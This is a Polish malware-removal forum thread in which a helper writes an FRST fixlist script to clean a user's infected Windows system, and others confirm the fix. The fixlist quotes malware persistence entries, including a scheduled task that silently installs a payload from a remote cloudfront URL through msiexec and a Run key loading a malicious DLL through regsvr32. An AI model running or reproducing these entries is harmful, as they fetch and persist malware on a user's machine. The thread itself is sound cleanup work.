Błąd w pliku Regsvr32

[rekki]

Witam

po odpaleniu FRST mam raporty które załączam. Proszę o pomoc przy stworzeniu pliku fixlist, z góry dziękuje

Addition.txt

FRST.txt

[jessica]

https://www.fixitpc.pl/topic/32661-uwaga-s%C4%85-op%C3%B3%C5%BAnienia-w-odpowiadaniu-nie-ma-os%C3%B3b-odpowiedzialnych-za-pomoc-trzeba-troch%C4%99-poczek%C4%87/

wcale nie musisz wykonywać moich zaleceń!

usuwanie podaję tylko na wypadek, gdybyś chciał szybko pozbyć się infekcji.

 

Uruchom FRST. NA klawiaturze naciśnij jednocześnie CTRL+Y.Otworzy się Notatnik - wklej do niego:

 

CustomCLSID: HKU\S-1-5-21-137526994-970686790-3836505406-1001_Classes\CLSID\{FBEB8A05-BEEE-4442-804E-409D6C4515E9}\InprocServer32 -> C:\Users\rekkis\AppData\Local\YZRPack\pxqxylft.dll => Brak pliku
Task: {0EA7836E-9169-4100-B5DA-E6B01BF3265F} - System32\Tasks\Microsoft\Windows\DeviceSettings\Fauphhawick => msiexec.exe /i hxxp://D2bUH1bF1g584W.clOuDfroNt.net/mmtsk/occup.php?p=3219913727_198264_62260BF2&d=20170525 /q <==== UWAGA
HKU\S-1-5-21-137526994-970686790-3836505406-1001\...\Run: [Emsftion] => C:\Windows\System32\regsvr32.exe C:\Users\rekkis\AppData\Local\YZRPack\pxqxylft.dll <===== UWAGA
HKU\S-1-5-21-137526994-970686790-3836505406-1001\...409d6c4515e9\InprocServer32: [Default-shell32] C:\Users\rekkis\AppData\Local\YZRPack\pxqxylft.dll UWAGA
HKLM\...\Providers\oqfxjsqv: C:\Program Files\Hetutain Monitor\local32spl.dll
FF DefaultSearchEngine: Mozilla\Firefox\Profiles\kxm63t72.default -> initialpage123
FF SelectedSearchEngine: Mozilla\Firefox\Profiles\kxm63t72.default -> initialpage123
2017-05-25 15:11 - 2017-05-25 15:52 - 00000000 ____D C:\Users\rekkis\AppData\Roaming\nh3oukwai1x
2017-05-25 15:11 - 2017-05-25 15:52 - 00000000 ____D C:\Users\rekkis\AppData\Roaming\h0f152dudbg
2017-05-25 15:11 - 2017-05-25 15:11 - 00140800 _____ C:\Users\rekkis\AppData\Local\installer.dat
2017-05-25 15:11 - 2017-05-25 15:11 - 00011568 _____ C:\Users\rekkis\AppData\Local\InstallationConfiguration.xml
2017-05-25 15:11 - 2017-05-25 15:11 - 00000000 ____D C:\Users\rekkis\AppData\Roaming\lqzba204nx5
2017-05-25 15:10 - 2017-05-25 15:52 - 00000000 ____D C:\Users\rekkis\AppData\Roaming\2segbxvccsj
2017-05-25 15:09 - 2017-05-25 15:16 - 00000000 ____D C:\Users\rekkis\AppData\Roaming\Perbot
2017-05-25 15:09 - 2017-05-25 15:09 - 00000000 ____D C:\Users\rekkis\AppData\Local\Jukokdrozph
C:\Windows\Minidump\*.dmp
HOSTS:
EmptyTemp:

Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach.

 
Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt.

 

jessi

Edytowane 26 Maja 2017 przez Rucek

[Rucek]

@rekki - nie napisałeś jaki jest problem, nie dostosowałeś się do zasad działu, skrypt Jessi możesz oczywiście wykonać, ale napisz też co się dzieje z kompem i czy po skrypcie nastąpiła poprawa.

[rekki]

Przepraszam że tak późno odpowiadam, ale dopiero teraz mam możliwość. Co do sedna sprawy, to problem wynikał z błędu w pliku Regsvr32 spowodowanego infekcją. W międzyczasie przeczytałem trochę o programie FRST, ale brakło mi doświadczenia w tej aplikacji.  Super sprawa, wszystko działa jak należy . Dziekuje ci Jessi pięknie za pomoc i pozdrawiam. 

[Miszel03]

Jessi przeanalizowała raporty poprawnie, więc nie mam co tu poprawiać. Usunęła infekcję i wyczyściła system, a co za tym idzie problem tytułowy. 

 

Dodam tylko, że jeden folder wymagana kasacji, a mianowicie C:\Program Files\Hetutain Monito, więc przez SHIFT + DELETE skasuj go. Po tym zabiegu uznaję, że możemy kończyć. 

 

Zastoju DelFix (kasacja używanych narzędzi) oraz zaktualizuj oprogramowanie zewnętrzne oraz Windows.